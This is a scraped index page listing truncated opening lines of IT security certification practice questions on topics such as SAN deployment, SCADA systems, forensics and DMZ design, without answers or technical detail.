Customers are receiving emails containing a link to malicious...
A security administrator is shown the following log excerpt from a...
A security tester is testing a website and performs the fo llowing...
After reviewing a company's NAS configuration and file system...
A company decides to purchase commercially available software...
An administrator wants to enable policy based flexible mandatory...
The source workstation image for new accounting PCs has begun...
A new internal network segmentation solution will be implemented into...
A vulnerability scanner report shows that a client-server host...
A software project manager has been provided with a requirement from...
An organization has several production critical SCADA supervisory...
A company is deploying a new iSCSl- based SAN. The requirements are as...
A web developer is responsible for a simple web application that books...
Company ABC's SAN is nearing capacity, and will cause costly...
Which of the following represents important technical controls for...
A security services company is scoping a proposal with a client. They...
A finance manager says that the company needs to ensure that the new...
A medical device manufacturer has decided to work with another...
A popular commercial virtualization platform allows for the creation...
A small company's Chief Executive Officer (CEO) has asked its...
A facilities manager has observed varying electric use on the...
A forensic analyst works for an e-discovery firm where several...
During a recent audit of servers, a company discovered that a network...
The senior security administrator wants to redesign the company DMZ to...
The Chief Information Security Officer (CISO) at a company knows that...
An accountant at a small business is trying to understand the value of...
The Chief Information Security Officer (CISO) is asking for ways to...
The security administrator finds unauthorized tables and records,...
Company XYZ has purchased and is now deploying a new HTML5...
The risk manager has requested a security solution that is cent rally...
An insurance company has an online quoting system for insurance...
Which of the following BEST constitutes the basis for protecting VMs...
An employee is performing a review of the organization's security...
Company policy requires that all unsupported operating systems be...
An organization is concerned with potential data loss in the event of...
An organization recently upgraded its wireless infrastructure to...
An organization uses IP address block 203.0.113.0/24 on its internal...
A developer is determining the best way to improve security within the...
A company that must comply with regulations is searching for a laptop...
Due to a new regulatory requirement, ABC Company must now encrypt all...
A security administrator wants to prevent sensitive data residing on...
A company is in the process of implementing a new front end user...
The technology steering committee is struggling with increased...
A security engineer on a large enterprise network needs to schedule...
A project manager working for a large city government is required to...
A forensic analyst receives a hard drive containing malware...
Alert!

Advertisement